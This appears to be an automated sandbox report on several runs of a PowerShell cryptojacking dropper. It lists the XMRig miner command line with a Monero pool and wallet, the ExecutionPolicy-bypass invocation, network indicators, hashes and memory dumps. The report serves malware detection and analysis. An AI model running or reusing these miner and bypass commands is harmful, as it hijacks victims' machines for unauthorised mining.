N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
NL 23.62.61.99:443 www.bing.com tcp
US 8.8.8.8:53 99.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 31.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 120.150.79.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dxornn0s.240.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:38

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
NL 23.62.61.104:443 www.bing.com tcp
US 8.8.8.8:53 104.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 94.65.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nwgwdn1j.wji.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:39

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1768s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 90.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ow2silrp.ksm.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:44

Platform

win10v2004-20240508-en

Max time kernel

1796s

Max time network

1807s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 24.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ldz3lbk3.5gg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:06

Platform

win11-20240508-en

Max time kernel

1797s

Max time network

1775s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gnru41kf.qh1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:40

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1774s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 f.f.f.f.d.b.b.8.0.9.8.2.0.9.0.8.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pldnjqln.jkf.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:13

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1752s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 210.80.50.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4092-4-0x00007FFA56F63000-0x00007FFA56F64000-memory.dmp

memory/4092-5-0x00000268FC150000-0x00000268FC172000-memory.dmp

memory/4092-8-0x00000268FC380000-0x00000268FC3F6000-memory.dmp

memory/4092-9-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/4092-18-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2wbvuvca.yis.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4092-25-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/4092-29-0x00007FFA56F63000-0x00007FFA56F64000-memory.dmp

memory/4092-30-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/4092-50-0x00000268FC2C0000-0x00000268FC2D2000-memory.dmp

memory/4092-63-0x00000268FC130000-0x00000268FC13A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/936-92-0x0000024EFC0F0000-0x0000024EFC110000-memory.dmp

memory/936-93-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-94-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-95-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-96-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-97-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-98-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-99-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-100-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-101-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-102-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-103-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-104-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-105-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-106-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-107-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-108-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-109-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-110-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-111-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-112-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-113-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-114-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-115-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-116-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

